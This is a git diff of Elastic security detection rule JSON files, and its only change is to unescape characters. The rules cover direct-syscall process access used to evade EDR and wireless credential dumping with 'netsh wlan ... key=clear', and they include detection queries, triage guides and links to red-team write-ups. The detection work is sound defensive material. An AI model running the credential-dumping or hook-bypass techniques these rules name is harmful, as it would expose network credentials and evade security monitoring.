ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_210.json b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_210.json index e0c3e1520b5..e8991cc52cf 100644 --- a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_210.json +++ b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_210.json @@ -12,8 +12,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Process Access via Direct System Call", - "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", - "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) \u003e 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) > 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", "references": [ "https://twitter.com/SBousseaden/status/1278013896440324096", "https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs" @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "2dd480be-1263-4d9c-8672-172928f6789a", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/2ddc468e-b39b-4f5b-9825-f3dcb0e998ea_1.json b/packages/security_detection_engine/kibana/security_rule/2ddc468e-b39b-4f5b-9825-f3dcb0e998ea_1.json index 83216cd6c1c..04bffa829ea 100644 --- a/packages/security_detection_engine/kibana/security_rule/2ddc468e-b39b-4f5b-9825-f3dcb0e998ea_1.json +++ b/packages/security_detection_engine/kibana/security_rule/2ddc468e-b39b-4f5b-9825-f3dcb0e998ea_1.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/2ddc468e-b39b-4f5b-9825-f3dcb0e998ea_2.json b/packages/security_detection_engine/kibana/security_rule/2ddc468e-b39b-4f5b-9825-f3dcb0e998ea_2.json index 99feb0c78ab..f1b5e2e5280 100644 --- a/packages/security_detection_engine/kibana/security_rule/2ddc468e-b39b-4f5b-9825-f3dcb0e998ea_2.json +++ b/packages/security_detection_engine/kibana/security_rule/2ddc468e-b39b-4f5b-9825-f3dcb0e998ea_2.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_101.json b/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_101.json index f4404b64b31..4fc73821baa 100644 --- a/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_101.json +++ b/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_101.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_102.json b/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_102.json index e94d0ff5b74..3c6e7769cd9 100644 --- a/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_102.json +++ b/packages/security_detection_engine/kibana/security_rule/2de10e77-c144-4e69-afb7-344e7127abd0_102.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_3.json b/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_3.json index f6a985a6662..9fde933de49 100644 --- a/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_3.json +++ b/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_3.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Wireless Credential Dumping using Netsh Command", - "note": "## Triage and analysis\n\n### Investigating Wireless Credential Dumping using Netsh Command\n\nNetsh is a Windows command line tool used for network configuration and troubleshooting. It enables the management of network settings and adapters, wireless network profiles, and other network-related tasks.\n\nThis rule looks for patterns used to dump credentials from wireless network profiles using Netsh, which can enable attackers to bring their own devices to the network.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Wireless Credential Dumping using Netsh Command\n\nNetsh is a Windows command line tool used for network configuration and troubleshooting. It enables the management of network settings and adapters, wireless network profiles, and other network-related tasks.\n\nThis rule looks for patterns used to dump credentials from wireless network profiles using Netsh, which can enable attackers to bring their own devices to the network.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"netsh.exe\" or process.pe.original_file_name == \"netsh.exe\") and\n process.args : \"wlan\" and process.args : \"key*clear\"\n", "references": [ "https://learn.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-contexts", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_4.json b/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_4.json index deff664a3ed..b21707c777f 100644 --- a/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_4.json +++ b/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_4.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Wireless Credential Dumping using Netsh Command", - "note": "## Triage and analysis\n\n### Investigating Wireless Credential Dumping using Netsh Command\n\nNetsh is a Windows command line tool used for network configuration and troubleshooting. It enables the management of network settings and adapters, wireless network profiles, and other network-related tasks.\n\nThis rule looks for patterns used to dump credentials from wireless network profiles using Netsh, which can enable attackers to bring their own devices to the network.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Wireless Credential Dumping using Netsh Command\n\nNetsh is a Windows command line tool used for network configuration and troubleshooting. It enables the management of network settings and adapters, wireless network profiles, and other network-related tasks.\n\nThis rule looks for patterns used to dump credentials from wireless network profiles using Netsh, which can enable attackers to bring their own devices to the network.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"netsh.exe\" or process.pe.original_file_name == \"netsh.exe\") and\n process.args : \"wlan\" and process.args : \"key*clear\"\n", "references": [ "https://learn.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-contexts", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_5.json b/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_5.json index 7d08ff6488d..7766d987b0d 100644 --- a/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_5.json +++ b/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_5.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Wireless Credential Dumping using Netsh Command", - "note": "## Triage and analysis\n\n### Investigating Wireless Credential Dumping using Netsh Command\n\nNetsh is a Windows command line tool used for network configuration and troubleshooting. It enables the management of network settings and adapters, wireless network profiles, and other network-related tasks.\n\nThis rule looks for patterns used to dump credentials from wireless network profiles using Netsh, which can enable attackers to bring their own devices to the network.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 